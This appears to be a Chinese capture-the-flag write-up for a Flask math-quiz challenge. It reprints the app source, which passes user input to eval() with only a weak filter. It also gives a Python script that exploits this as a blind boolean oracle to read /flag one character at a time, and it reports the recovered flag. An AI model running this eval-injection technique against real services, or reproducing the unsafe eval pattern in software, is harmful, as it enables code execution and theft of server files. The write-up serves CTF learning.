打开页面是这样的
初步思路,打开F12,查看头,都发现了这个表达式的base64加密字符串。编写脚本提交答案,发现不对;
无奈点开source发现源代码,是flask,初始化表达式,获取提交的表达式,赋值新的表达式,没发现有什么问题,但是eval是个危险函数,前后端没有严格的过滤,这个可以利用,输入:(-497559)+(969608)+(-255632)+(587860)+(716596) and 1==1 后提示Congratulations。source代码和实现代码如下
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request,session
from config import create
import os
app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)
## flag is in /flag try to get it
@app.route('/', methods=['GET', 'POST'])
def index():
def filter(string):
if "or" in string:
return "hack"
return string
if request.method == 'POST':
input = request.form['input']
create_question = create()
input_question = session.get('question')
session['question'] = create_question
if input_question==None:
return render_template('index.html', answer="Invalid session please try again!", question=create_question)
if filter(input)=="hack":
return render_template('index.html', answer="hack", question=create_question)
try:
calc_result = str((eval(input_question + "=" + str(input))))
if calc_result == 'True':
result = "Congratulations"
elif calc_result == 'False':
result = "Error"
else:
result = "Invalid"
except:
result = "Invalid"
return render_template('index.html', answer=result,question=create_question)
if request.method == 'GET':
create_question = create()
session['question'] = create_question
return render_template('index.html',question=create_question)
@app.route('/source')
def source():
return open("app.py", "r").read()
if __name__ == '__main__':
app.run(host="0.0.0.0", debug=False)
python
import requests
import re
def main():
alphabet = ['{','}', '@', '_',',','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
url='ip'
data={"input":""}
s = requests.Session()
flag = ''
for i in range(0,100):
for char in alphabet:
try:
r = s.get(url)
question = re.search(r"<h4>(.*)</h4>", r.text.decode(), re.M|re.I).group().replace("<h4>", "").replace("</h4>","")[:-1]
data["input"] = "{0} and '{2}'==(open('/flag','r').read()[{1}])".format(question, i, char)
r = s.post(url, data=data)
result = r.content.decode()
if r"Congratulations" in result:
flag += char
print(flag)
break
except Exception as e:
print("Exception: ", end='')
print(e)
if __name__ == '__main__':
main()运行后得到flag : DASCTF{53a6ee70a3e8c013e2b1dbb2b926d3b2}